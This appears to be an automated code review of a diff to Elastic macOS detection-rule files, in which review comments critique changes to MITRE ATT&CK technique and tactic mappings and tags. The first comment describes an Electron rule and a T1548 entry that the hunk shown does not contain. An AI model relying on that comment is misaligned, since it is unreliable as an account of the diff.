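Review bot: The second hunk drops `T1059.007` (JavaScript) from a rule about Electron apps spawning Node.js children, which is the one sub-technique that names the behavior, and adds a Defense Evasion entry mapped to `T1548` (Abuse Elevation Control Mechanism) whose relevance to a child-process detection is not explained anywhere in the diff. If Defense Evasion is intended, the technique choice deserves a note in the PR; otherwise drop both that entry and the `Tactic: Defense Evasion` tag added in the first hunk so tags and tactics stay aligned. Restoring the `[[rule.threat.technique.subtechnique]]` table with `id = "T1059.007"` under `T1059` looks like the safer change.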
@@ -2,7 +2,7 @@ creation_date = "2020/12/23" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/18" [rule] author = ["Elastic"] @@ -106,31 +106,26 @@ Web browsers are integral to user interaction with the internet, often serving a [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique]] id = "T1203" name = "Exploitation for Client Execution" reference = "https://attack.mitre.org/techniques/T1203/" + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1189" name = "Drive-by Compromise" reference = "https://attack.mitre.org/techniques/T1189/" + [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + diff --git a/rules/macos/execution_installer_package_spawned_network_event.toml b/rules/macos/execution_installer_package_spawned_network_event.toml index d69784d76b8..f54b8347f48 100644 --- a/rules/macos/execution_installer_package_spawned_network_event.toml +++ b/rules/macos/execution_installer_package_spawned_network_event.toml @@ -2,7 +2,7 @@ creation_date = "2021/02/23" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/04/21" [rule] author = ["Elastic"] 
@@ -112,36 +112,36 @@ MacOS installer packages, often with a .pkg extension, are used to distribute so [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1105" -name = "Ingress Tool Transfer" -reference = "https://attack.mitre.org/techniques/T1105/" - -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.007" +name = "JavaScript" +reference = "https://attack.mitre.org/techniques/T1059/007/" -[[rule.threat.technique]] -id = "T1204" -name = "User Execution" -reference = "https://attack.mitre.org/techniques/T1204/" -[[rule.threat.technique.subtechnique]] -id = "T1204.002" -name = "Malicious File" -reference = "https://attack.mitre.org/techniques/T1204/002/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" +[[rule.threat.technique.subtechnique]] +id = "T1071.001" +name = "Web Protocols" +reference = "https://attack.mitre.org/techniques/T1071/001/" + + + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + diff --git a/rules/macos/execution_python_shell_spawn_first_occurrence.toml b/rules/macos/execution_python_shell_spawn_first_occurrence.toml index 19c07e9db90..6da50e09b03 100644 --- a/rules/macos/execution_python_shell_spawn_first_occurrence.toml +++ b/rules/macos/execution_python_shell_spawn_first_occurrence.toml 
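Review bot: The new side maps an installer-package (`.pkg`) rule to `T1059.007` (JavaScript) and removes `T1204.002` (Malicious File), although a user-launched installer package is the standard case for `T1204.002` and nothing in the hunk or the rule's context line mentions JavaScript. The Command and Control entry also changes from `T1105` (Ingress Tool Transfer) to `T1071.001` (Web Protocols); either can fit a post-install network event, but the hunk gives no reason for the swap. If these are deliberate, a one-line note in the PR description would help; if not, restoring `T1204` / `T1204.002` under Execution is the minimal fix.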
@@ -2,7 +2,7 @@ creation_date = "2026/02/23" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/23" [rule] author = ["Elastic"] @@ -76,17 +76,10 @@ not process.command_line:(*pip* or *conda* or *brew* or *jupyter*) [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" - [[rule.threat.technique.subtechnique]] id = "T1059.006" name = "Python" @@ -96,6 +89,7 @@ reference = "https://attack.mitre.org/techniques/T1059/006/" id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [rule.new_terms] field = "new_terms_fields" value = ["host.id", "process.parent.executable"] diff --git a/rules/macos/execution_script_via_automator_workflows.toml b/rules/macos/execution_script_via_automator_workflows.toml index 0fc33f5e576..a5320a95420 100644 --- a/rules/macos/execution_script_via_automator_workflows.toml +++ b/rules/macos/execution_script_via_automator_workflows.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/23" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/18" [rule] author = ["Elastic"] @@ -97,18 +97,14 @@ Automator, a macOS utility, allows users to automate repetitive tasks through wo [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.007" -name = "JavaScript" -reference = "https://attack.mitre.org/techniques/T1059/007/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + 
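Review bot: The second hunk removes `T1059.004` (Unix Shell) from `execution_python_shell_spawn_first_occurrence.toml`, a rule whose name and query context (`process.command_line` filters for `pip`, `conda`, `brew`, `jupyter`) are about Python spawning a shell, so the shell sub-technique is the one that describes the detected child. The same loss of the specific sub-technique occurs in the Automator hunk on this line (`T1059.007` removed) and in `execution_shell_execution_via_apple_scripting.toml` later in this chunk, where `T1059.002`, `T1059.004` and `T1059.007` are all dropped from a rule named after shell execution via AppleScript. If the sub-technique tables were removed for a reason (for example a validator rejecting them), that reason belongs in the commit message; otherwise keeping them is more accurate.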
diff --git a/rules/macos/execution_scripting_osascript_exec_followed_by_netcon.toml b/rules/macos/execution_scripting_osascript_exec_followed_by_netcon.toml index 24770fce50b..f657656b65c 100644 --- a/rules/macos/execution_scripting_osascript_exec_followed_by_netcon.toml +++ b/rules/macos/execution_scripting_osascript_exec_followed_by_netcon.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/07" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/18" [rule] author = ["Elastic"] @@ -108,31 +108,31 @@ AppleScript, a scripting language for macOS, automates tasks by controlling appl [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1071" -name = "Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1071/" - -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] id = "T1059.002" name = "AppleScript" reference = "https://attack.mitre.org/techniques/T1059/002/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" + + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + diff --git a/rules/macos/execution_shell_execution_via_apple_scripting.toml b/rules/macos/execution_shell_execution_via_apple_scripting.toml index dca693e0d11..03218b38b18 100644 --- a/rules/macos/execution_shell_execution_via_apple_scripting.toml 
+++ b/rules/macos/execution_shell_execution_via_apple_scripting.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/07" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/18" [rule] author = ["Elastic"] @@ -101,28 +101,14 @@ AppleScript and JXA are scripting languages used in macOS to automate tasks and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.002" -name = "AppleScript" -reference = "https://attack.mitre.org/techniques/T1059/002/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.007" -name = "JavaScript" -reference = "https://attack.mitre.org/techniques/T1059/007/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/macos/execution_unusual_library_load_via_python.toml b/rules/macos/execution_unusual_library_load_via_python.toml index be7f92e752a..99c96e54eed 100644 --- a/rules/macos/execution_unusual_library_load_via_python.toml +++ b/rules/macos/execution_unusual_library_load_via_python.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/30" [rule] author = ["Elastic"] 
@@ -82,12 +82,17 @@ library where host.os.type == "macos" and event.action == "load" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1129" -name = "Shared Modules" -reference = "https://attack.mitre.org/techniques/T1129/" + [rule.threat.tactic] + name = "Execution" + id = "TA0002" + reference = "https://attack.mitre.org/tactics/TA0002/" -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat.technique]] + name = "Command and Scripting Interpreter" + id = "T1059" + reference = "https://attack.mitre.org/techniques/T1059/" + + [[rule.threat.technique.subtechnique]] + name = "Python" + id = "T1059.006" + reference = "https://attack.mitre.org/techniques/T1059/006/" diff --git a/rules/macos/initial_access_suspicious_mac_ms_office_child_process.toml b/rules/macos/initial_access_suspicious_mac_ms_office_child_process.toml index a5996a567c2..b89f017f619 100644 --- a/rules/macos/initial_access_suspicious_mac_ms_office_child_process.toml +++ b/rules/macos/initial_access_suspicious_mac_ms_office_child_process.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/04" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/02/04" [rule] author = ["Elastic"] @@ -45,7 +45,14 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" 
@@ -157,43 +164,19 @@ Microsoft Office applications on macOS can be exploited by adversaries to execut [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.002" -name = "AppleScript" -reference = "https://attack.mitre.org/techniques/T1059/002/" - +id = "T1566" +name = "Phishing" +reference = "https://attack.mitre.org/techniques/T1566/" [[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" +id = "T1566.001" +name = "Spearphishing Attachment" +reference = "https://attack.mitre.org/techniques/T1566/001/" -[[rule.threat.technique.subtechnique]] -id = "T1059.006" -name = "Python" -reference = "https://attack.mitre.org/techniques/T1059/006/" -[[rule.threat.technique]] -id = "T1203" -name = "Exploitation for Client Execution" -reference = "https://attack.mitre.org/techniques/T1203/" - -[[rule.threat.technique]] -id = "T1204" -name = "User Execution" -reference = "https://attack.mitre.org/techniques/T1204/" - -[[rule.threat.technique.subtechnique]] -id = "T1204.002" -name = "Malicious File" -reference = "https://attack.mitre.org/techniques/T1204/002/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + diff --git a/rules/macos/lateral_movement_credential_access_kerberos_bifrostconsole.toml b/rules/macos/lateral_movement_credential_access_kerberos_bifrostconsole.toml index 15870020bd0..23775e46154 100644 --- a/rules/macos/lateral_movement_credential_access_kerberos_bifrostconsole.toml +++ b/rules/macos/lateral_movement_credential_access_kerberos_bifrostconsole.toml 
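Review bot: The Office child-process rule now carries only Initial Access (`TA0001`, `T1566.001`) and loses every Execution technique (`T1059.*`, `T1203`, `T1204.002`), while the hunk's own context line says the rule is about Office being used to execute child processes. Spearphishing Attachment describes how a document arrived, which a child-process rule cannot observe; the observed behavior is execution, so keeping an Execution entry (at least `T1204.002` or `T1203`) alongside Initial Access would be more accurate. The tags hunk on the previous line swaps `Tactic: Execution` for `Tactic: Initial Access`, so if an Execution entry is kept, `Tactic: Execution` must be re-added as well to keep tags and tactics consistent.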
@@ -2,7 +2,7 @@ creation_date = "2020/01/12" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/02" [rule] author = ["Elastic"] @@ -103,36 +103,36 @@ Kerberos is a network authentication protocol designed to provide secure identit [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" +[[rule.threat.technique.subtechnique]] +id = "T1550.003" +name = "Pass the Ticket" +reference = "https://attack.mitre.org/techniques/T1550/003/" + + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1558" name = "Steal or Forge Kerberos Tickets" reference = "https://attack.mitre.org/techniques/T1558/" - [[rule.threat.technique.subtechnique]] id = "T1558.003" name = "Kerberoasting" reference = "https://attack.mitre.org/techniques/T1558/003/" + + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1550" -name = "Use Alternate Authentication Material" -reference = "https://attack.mitre.org/techniques/T1550/" - -[[rule.threat.technique.subtechnique]] -id = "T1550.003" -name = "Pass the Ticket" -reference = "https://attack.mitre.org/techniques/T1550/003/" - -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules/macos/lateral_movement_remote_ssh_login_enabled.toml b/rules/macos/lateral_movement_remote_ssh_login_enabled.toml index 6244c0b65f5..5d7922d88c6 100644 --- a/rules/macos/lateral_movement_remote_ssh_login_enabled.toml +++ b/rules/macos/lateral_movement_remote_ssh_login_enabled.toml 
@@ -2,7 +2,7 @@ creation_date = "2020/08/18" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/18" [rule] author = ["Elastic"] @@ -45,7 +45,14 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -94,13 +101,19 @@ The `systemsetup` command in macOS is a utility that allows administrators to co [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1133" -name = "External Remote Services" -reference = "https://attack.mitre.org/techniques/T1133/" +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" +[[rule.threat.technique.subtechnique]] +id = "T1021.004" +name = "SSH" +reference = "https://attack.mitre.org/techniques/T1021/004/" + + [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" + diff --git a/rules/macos/lateral_movement_suspicious_curl_to_jamf_endpoint.toml b/rules/macos/lateral_movement_suspicious_curl_to_jamf_endpoint.toml index e07d5fce074..e96f7b9451c 100644 --- a/rules/macos/lateral_movement_suspicious_curl_to_jamf_endpoint.toml +++ b/rules/macos/lateral_movement_suspicious_curl_to_jamf_endpoint.toml 
@@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/30" [rule] author = ["Elastic"] @@ -19,7 +19,15 @@ name = "Suspicious Curl to Jamf Endpoint" risk_score = 73 rule_id = "a8256685-9736-465b-b159-f25a172d08e8" severity = "high" -tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Lateral Movement", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Resources: Investigation Guide" +] timestamp_override = "event.ingested" type = "eql" note = """## Triage and analysis @@ -70,12 +78,25 @@ process where host.os.type == "macos" and event.type == "start" and event.action [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1072" -name = "Software Deployment Tools" -reference = "https://attack.mitre.org/techniques/T1072/" + [rule.threat.tactic] + name = "Lateral Movement" + id = "TA0008" + reference = "https://attack.mitre.org/tactics/TA0008/" -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" + [[rule.threat.technique]] + name = "Software Deployment Tools" + id = "T1072" + reference = "https://attack.mitre.org/techniques/T1072/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + + [rule.threat.tactic] + name = "Execution" + id = "TA0002" + reference = "https://attack.mitre.org/tactics/TA0002/" + + [[rule.threat.technique]] + name = "Software Deployment Tools" + id = "T1072" + reference = "https://attack.mitre.org/techniques/T1072/" diff --git a/rules/macos/lateral_movement_vpn_connection_attempt.toml b/rules/macos/lateral_movement_vpn_connection_attempt.toml index 94da2795aeb..448fb9b9bff 100644 --- a/rules/macos/lateral_movement_vpn_connection_attempt.toml 
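Review bot: The rebuilt threat section is hand-formatted differently from the other rule files in this change — tables indented, `[rule.threat.tactic]` placed before the `[[rule.threat.technique]]` entries, keys ordered `name, id, reference` instead of `id, name, reference`, and the `tags` list without a trailing comma after `"Resources: Investigation Guide"` — so a later normalization pass will likely rewrite these lines and produce diff noise. Emit it in the form the sibling files use: `[[rule.threat.technique]]` / `id = "T1072"` / `name = "Software Deployment Tools"` first, `[rule.threat.tactic]` after, and add the trailing comma. The same layout appears in persistence_apple_mail_rule_modification.toml, persistence_curl_execution_via_shell_profile.toml, persistence_hidden_plist_filename.toml and persistence_manual_chromium_extension_loading.toml. Listing T1072 under both Lateral Movement and Execution is itself fine, since ATT&CK places the technique under both tactics.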
+++ b/rules/macos/lateral_movement_vpn_connection_attempt.toml @@ -2,7 +2,7 @@ creation_date = "2020/01/25" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/18" [rule] author = ["Elastic"] @@ -48,7 +48,14 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Initial Access", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -98,13 +105,14 @@ Virtual Private Networks (VPNs) are used to securely connect to remote networks, [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1133" -name = "External Remote Services" -reference = "https://attack.mitre.org/techniques/T1133/" +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" + [rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" + diff --git a/rules/macos/persistence_account_creation_hide_at_logon.toml b/rules/macos/persistence_account_creation_hide_at_logon.toml index e871422d1c8..8ffa3621827 100644 --- a/rules/macos/persistence_account_creation_hide_at_logon.toml +++ b/rules/macos/persistence_account_creation_hide_at_logon.toml @@ -2,7 +2,7 @@ creation_date = "2020/01/05" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/18" [rule] author = ["Elastic"] 
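Review bot: Replacing T1133 External Remote Services with T1021 Remote Services for a VPN connection attempt looks like a regression in mapping precision: T1133's description explicitly lists VPNs as an example of external remote services, whereas T1021 covers logging into services such as SSH, VNC or SMB inside the network. If the intent is to treat the VPN connection as lateral movement, keeping `id = "T1133"` under the new Lateral Movement tactic would be defensible, since ATT&CK lists T1133 under both Persistence and Initial Access and the tag change to `Tactic: Lateral Movement` is already consistent with the new `[rule.threat.tactic]`. Confirm against the query, which is outside this hunk.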
@@ -44,7 +44,14 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -91,31 +98,19 @@ In macOS environments, the `dscl` command-line utility manages directory service [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1564" -name = "Hide Artifacts" -reference = "https://attack.mitre.org/techniques/T1564/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.003" +name = "Local Accounts" +reference = "https://attack.mitre.org/techniques/T1078/003/" -[[rule.threat.technique]] -id = "T1136" -name = "Create Account" -reference = "https://attack.mitre.org/techniques/T1136/" -[[rule.threat.technique.subtechnique]] -id = "T1136.001" -name = "Local Account" -reference = "https://attack.mitre.org/techniques/T1136/001/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules/macos/persistence_apple_mail_rule_modification.toml b/rules/macos/persistence_apple_mail_rule_modification.toml index 22c83563e54..4e7a49b2daa 100644 --- a/rules/macos/persistence_apple_mail_rule_modification.toml 
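Review bot: Dropping the Defense Evasion entry (T1564 Hide Artifacts) and replacing T1136.001 Create Account: Local Account with T1078.003 Valid Accounts: Local Accounts changes what the rule claims to detect — the filename says account creation hidden at logon, and T1078 describes the use of an existing account rather than its creation. If the rule still matches account-creation commands, the closer mapping is to keep `id = "T1136.001"` under Persistence and, for the hidden aspect, `T1564.002` Hidden Users under Defense Evasion (with `Tactic: Defense Evasion` retained in `tags`). The query is outside this hunk, so confirm before merging.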
+++ b/rules/macos/persistence_apple_mail_rule_modification.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/09" [rule] author = ["Elastic"] @@ -81,12 +81,25 @@ file where host.os.type == "macos" and event.type != "deletion" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1546" -name = "Event Triggered Execution" -reference = "https://attack.mitre.org/techniques/T1546/" + [rule.threat.tactic] + name = "Persistence" + id = "TA0003" + reference = "https://attack.mitre.org/tactics/TA0003/" -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat.technique]] + name = "Event Triggered Execution" + id = "T1546" + reference = "https://attack.mitre.org/techniques/T1546/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + + [rule.threat.tactic] + name = "Execution" + id = "TA0002" + reference = "https://attack.mitre.org/tactics/TA0002/" + + [[rule.threat.technique]] + name = "User Execution" + id = "T1204" + reference = "https://attack.mitre.org/techniques/T1204/" diff --git a/rules/macos/persistence_creation_change_launch_agents_file.toml b/rules/macos/persistence_creation_change_launch_agents_file.toml index 7ad252a6bd9..25970d8647b 100644 --- a/rules/macos/persistence_creation_change_launch_agents_file.toml +++ b/rules/macos/persistence_creation_change_launch_agents_file.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/07" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/04/21" [rule] author = ["Elastic"] 
@@ -100,18 +100,19 @@ Launch Agents in macOS are used to execute scripts or applications automatically [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" - [[rule.threat.technique.subtechnique]] -id = "T1543.004" -name = "Launch Daemon" -reference = "https://attack.mitre.org/techniques/T1543/004/" +id = "T1543.001" +name = "Launch Agent" +reference = "https://attack.mitre.org/techniques/T1543/001/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules/macos/persistence_creation_hidden_login_item_osascript.toml b/rules/macos/persistence_creation_hidden_login_item_osascript.toml index ac0eaca6c1d..1dd6607c7eb 100644 --- a/rules/macos/persistence_creation_hidden_login_item_osascript.toml +++ b/rules/macos/persistence_creation_hidden_login_item_osascript.toml @@ -2,7 +2,7 @@ creation_date = "2020/01/05" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/18" [rule] author = ["Elastic"] @@ -43,7 +43,15 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" 
@@ -89,18 +97,43 @@ AppleScript is a scripting language for automating tasks on macOS, including man [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" -[[rule.threat.technique.subtechnique]] -id = "T1547.015" -name = "Login Items" -reference = "https://attack.mitre.org/techniques/T1547/015/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.002" +name = "AppleScript" +reference = "https://attack.mitre.org/techniques/T1059/002/" + + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1647" +name = "Plist File Modification" +reference = "https://attack.mitre.org/techniques/T1647/" + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/macos/persistence_credential_access_authorization_plugin_creation.toml b/rules/macos/persistence_credential_access_authorization_plugin_creation.toml index 018ccfaa192..15e61637816 100644 --- a/rules/macos/persistence_credential_access_authorization_plugin_creation.toml +++ b/rules/macos/persistence_credential_access_authorization_plugin_creation.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/13" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/18" [rule] author = ["Elastic"] 
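Review bot: The new side adds a third `[[rule.threat]]` entry with `name = "Defense Evasion"` (TA0005 / T1647), but the `tags` rewrite for this file in the preceding hunk adds only `"Tactic: Persistence"` and `"Tactic: Execution"`, so tags and `rule.threat.tactic` now disagree and the tag/tactic consistency check will report a missing `Tactic: Defense Evasion`. Either add `"Tactic: Defense Evasion",` to `tags` or drop the T1647 entry. The hunk also removes the `T1547.015` Login Items sub-technique, which is the exact ATT&CK entry for login items; keeping it under the T1547 technique costs nothing. The added blank lines are uneven (none after `framework`, three before the Execution tactic table).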
